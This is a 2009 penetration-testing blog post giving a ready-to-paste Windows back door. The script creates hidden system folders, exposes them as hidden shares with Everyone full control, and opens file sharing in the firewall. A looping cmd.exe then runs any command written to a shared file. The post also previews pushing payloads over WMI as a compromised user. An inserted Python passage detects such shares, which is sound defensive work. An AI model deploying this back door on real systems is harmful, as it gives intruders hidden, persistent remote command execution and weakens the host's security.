Friday, March 13, 2009

Attack Script Part 1

First off, let me say that I am going to start posting shorter blogs more frequently. I guess I have been kind of inspired by Twitter. Instead of one giant post every month I am going to try to post several smaller posts. I am also going to be using this blog as a sounding board for my upcoming CCIE Security Lab studies. I am going to write down what I encounter and see if anything strikes any readers out there on the net.

We are going to create a back door that we can use over Windows file sharing. It will allow you to run any command and have its output exported into a file. This is an add-on to Ed Skoudis's for loop that allows this to happen.

So let's say we have popped a shell on a Windows box. Ok, pentest is over, right? Wrong! We need to use this box as a pivot point to try to go deeper into the network. So what can we do to keep access to this system without introducing any new software onto it?

We start by creating a couple of folders. We want to create these folders in a somewhat inconspicuous location. I usually choose C:\windows\system. The commands to do this are:

mkdir C:\windows\system\input
mkdir C:\windows\system\output

Next we want to hide the two folders by marking them as both hidden and system folders. Anyone looking for them then has to unhide both hidden files and protected operating system files in Explorer before the folders show up. To do this we use the following commands.

attrib C:\windows\system\input +H +S
attrib C:\windows\system\output +H +S

Now we want to share the two folders. To do this we use the net share command, but we put a dollar sign at the end of each share name so the shares aren't visible when browsing the network.

net share input$=c:\windows\system\input
net share output$=c:\windows\system\output


Now the next step is up to you and your rules of engagement. What we want to do is control access to these shares. The easiest way is to give the folders the Everyone permission, but this might introduce new vulnerabilities into the system. It might be prudent to create a new user on the system and then give only that user permission to these folders. It's up to you, but for the sake of the example we will use the Everyone permission.

echo Y| cacls c:\windows\system\input /P everyone:F
echo Y| cacls c:\windows\system\output /P everyone:F

Next we turn on file sharing in the Windows firewall so Windows serves these shares the way we want it to. We do this with some netsh fu.

netsh firewall set service type = FILEANDPRINT mode = ENABLE

We now want to dump a command into our commands.txt file. This is the file we will echo commands into to run them through the back door. We dump a sample command into it first to make sure our loop is working. The command is:

echo ipconfig /all > c:\windows\system\input\commands.txt

Now we finally set our loop in motion. This loop takes the commands from commands.txt, runs them, and then dumps the output to output.txt. The loop looks like the following.

for /L %i in (1,0,2) do (for /f "delims=^" %j in (c:\windows\system\input\commands.txt) do cmd.exe /c %j >> c:\windows\system\output\output.txt & del c:\windows\system\input\commands.txt) & ping -n 2 127.0.0.1

I know this looks like someone threw up on your command line. It works though!! What it does is look for the commands.txt file. It then reads the file, runs the command in it, and deletes the file. The output is appended to the output.txt file. It does this every two seconds. So what we have is the following script that can be pasted into a shell.

REM make them
mkdir c:\windows\system\input
mkdir c:\windows\system\output

REM hide them
attrib c:\windows\system\input +H +S
attrib c:\windows\system\output +H +S

REM share them
net share input$=c:\windows\system\input
net share output$=c:\windows\system\output

REM allow everyone into them
echo Y| cacls c:\windows\system\input /P everyone:F
echo Y| cacls c:\windows\system\output /P everyone:F

REM enable file sharing in the firewall
netsh firewall set service type = FILEANDPRINT mode = ENABLE

REM dump a sample command into commands.txt
echo ipconfig /all > c:\windows\system\input\commands.txt

REM use Ed Skoudis's for /L loop
for /L %i in (1,0,2) do (for /f "delims=^" %j in (c:\windows\system\input\commands.txt) do cmd.exe /c %j >> c:\windows\system\output\output.txt & del c:\windows\system\input\commands.txt) & ping -n 2 127.0.0.1


So you can now copy out the above text and paste it into your shell. If you want to make this a batch file, make sure you change all of the % symbols in the loop to %%; then it will work as a batch file.

To make sure it's working after you start the loop use the following command.

type \\(ip-address)\output$\output.txt

You should see the output of ipconfig /all on the screen.

To run a new command we use the following:

echo (command) > \\(ip-address)\input$\commands.txt

Ok, so that's it: a quick, simple and dirty Windows command line back door.
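From the defender's side, the shares this post sets up have a recognisable shape: a non-default hidden share, rooted under the Windows directory, on a folder marked hidden+system, with Everyone granted full control. The following Python script is an added example (not part of the original post) that parses the text output of the same tools the post uses (net share, attrib and cacls) and flags any share that matches that shape. The tool output it parses is constructed for illustration; the share names and paths are the ones used above.

```python
"""Flag non-default hidden SMB shares that look like a file-share back door.

Added example, not from the original post. Parses text output of the
Windows tools the post uses (net share, attrib, cacls); the samples below
are constructed, not captured from a real host.
"""
import re

# Constructed sample of ``net share`` output on a host carrying the shares.
NET_SHARE_OUTPUT = """\
Share name   Resource                        Remark

-------------------------------------------------------------------------------
C$           C:\\                             Default share
IPC$                                         Remote IPC
ADMIN$       C:\\WINDOWS                      Remote Admin
input$       c:\\windows\\system\\input
output$      c:\\windows\\system\\output
Public       C:\\Users\\Public
The command completed successfully.
"""

# Constructed sample of ``attrib`` output for the folders of interest.
ATTRIB_OUTPUT = """\
   SH       C:\\windows\\system\\input
   SH       C:\\windows\\system\\output
             C:\\Users\\Public
"""

# Constructed sample of ``cacls`` output for the same folders.
CACLS_OUTPUT = """\
c:\\windows\\system\\input Everyone:F
c:\\windows\\system\\output Everyone:F
C:\\Users\\Public BUILTIN\\Users:(OI)(CI)R
                 NT AUTHORITY\\SYSTEM:(OI)(CI)F
"""

# Hidden shares Windows creates itself; drive shares (C$, D$) are matched by regex.
DEFAULT_HIDDEN = {"IPC$", "ADMIN$", "PRINT$", "FAX$"}
SYSTEM_ROOTS = ("c:\\windows", "c:\\program files")


def parse_net_share(text):
    """Return {share_name: local_path} from ``net share`` output."""
    shares = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith(("Share name", "---", "The command")):
            continue
        parts = re.split(r"\s{2,}", line.strip())
        # IPC$ has no resource column; every other share lists a local path.
        path = parts[1] if len(parts) > 1 and re.match(r"^[A-Za-z]:\\", parts[1]) else ""
        shares[parts[0]] = path
    return shares


def parse_attrib(text):
    """Return {path_lower: set(attribute letters)} from ``attrib`` output."""
    attrs = {}
    for line in text.splitlines():
        m = re.match(r"^\s*([A-Z ]*?)\s+([A-Za-z]:\\.*)$", line)
        if m:
            attrs[m.group(2).strip().lower()] = set(m.group(1).replace(" ", ""))
    return attrs


def parse_cacls(text):
    """Return {path_lower: [ACE strings]} from ``cacls`` output (ACEs may wrap)."""
    acls, current = {}, None
    for line in text.splitlines():
        m = re.match(r"^([A-Za-z]:\\\S*)\s+(.*)$", line)
        if m:
            current = m.group(1).lower()
            acls[current] = [m.group(2).strip()]
        elif current and line.strip():
            acls[current].append(line.strip())
    return acls


def find_backdoor_shares(net_share_text, attrib_text, cacls_text):
    """Return sorted (share, path, reasons) for hidden shares matching the pattern."""
    shares = parse_net_share(net_share_text)
    attrs = parse_attrib(attrib_text)
    acls = parse_cacls(cacls_text)
    findings = []
    for name, path in shares.items():
        if not name.endswith("$"):
            continue  # visible shares are out of scope for this rule
        if name.upper() in DEFAULT_HIDDEN or re.fullmatch(r"[A-Za-z]\$", name):
            continue  # built-in administrative shares
        key = path.lower()
        reasons = ["non-default hidden share"]
        if key.startswith(SYSTEM_ROOTS):
            reasons.append("share rooted under a system directory")
        if {"H", "S"} <= attrs.get(key, set()):
            reasons.append("folder marked hidden+system")
        if any(ace.lower().startswith("everyone:f") for ace in acls.get(key, [])):
            reasons.append("Everyone has full control")
        findings.append((name, path, reasons))
    return sorted(findings)


if __name__ == "__main__":
    for share, path, reasons in find_backdoor_shares(NET_SHARE_OUTPUT, ATTRIB_OUTPUT, CACLS_OUTPUT):
        print(f"{share:10} {path:32} {'; '.join(reasons)}")
```

On a real host, redirect the three commands to files and pass their contents to find_backdoor_shares(). Where hidden shares are expected (software deployment shares, for instance), extend DEFAULT_HIDDEN for those names rather than dropping the attribute or ACL checks, since it is the combination of all four signals that makes the match strong.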

In the next post I will write a script that uses WMI to copy over any payload you want and then run it. You can use the runas command to run the script as a user that you have already compromised. You can then turn the above script into a batch file and run it without having to pop a shell on the machine.
